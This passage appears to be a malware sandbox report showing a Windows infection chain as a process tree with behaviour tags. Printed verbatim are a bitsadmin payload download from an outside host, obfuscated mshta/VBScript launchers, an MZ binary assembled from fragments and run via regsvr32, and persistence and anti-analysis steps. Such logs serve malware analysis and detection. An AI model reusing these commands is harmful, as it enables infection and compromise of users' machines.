                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                PID:1924
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S
                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                  PID:6532
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                      PID:8612
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                        PID:1436
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                                                          PID:368
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                            PID:5356
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                              PID:4340
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                                                                PID:8356
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2056
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                  PID:7020
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7352
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6816
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6672
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7652
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4008
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4628
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4628" "1600" "2256" "2204" "0" "0" "2308" "0" "0" "0" "0" "0"
                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7928
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
                                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5068
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                      PID:4880
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4208
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:680
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5392
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:4764
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9124
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                              PID:7916
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe"
                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5844
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe"
                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                PID:5900
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe"
                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 676
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:6380
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 728
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:3344
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe"
                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:5376
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"
                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                  PID:1240
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5616
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3944
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                    Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                    PID:2104
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                      PID:1908
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                      PID:2420
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:344
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17332e41e6b.exe
                                                                                                                                                                                                                                                                                                                                                                      Mon17332e41e6b.exe
                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                      PID:2288
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5431899.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5431899.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                        PID:2868
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\520258.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\520258.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                        PID:4380
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7540508.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7540508.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                        PID:4636
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5667762.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5667762.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                        PID:4880
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5667762.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5667762.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                          PID:1908
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5667762.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\5667762.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4136
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                                                                                                                                                                                                                                                                                                                LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7048
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6172
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1512
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7164
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6980
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
                                                                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                                  regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7620
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                            taskkill /im "5667762.exe" /f
                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                            PID:6364
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5952231.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5952231.exe"
                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      PID:2452
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5824839.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5824839.exe"
                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                      PID:5008
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1744
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                                                                                                                                                      Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                      PID:1652
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4424
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 1652 -s 492
                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                          PID:4816
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1320
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                                                                                                                                                                          Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          PID:1560
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            PID:1164
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1424
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178d8e5d06822.exe
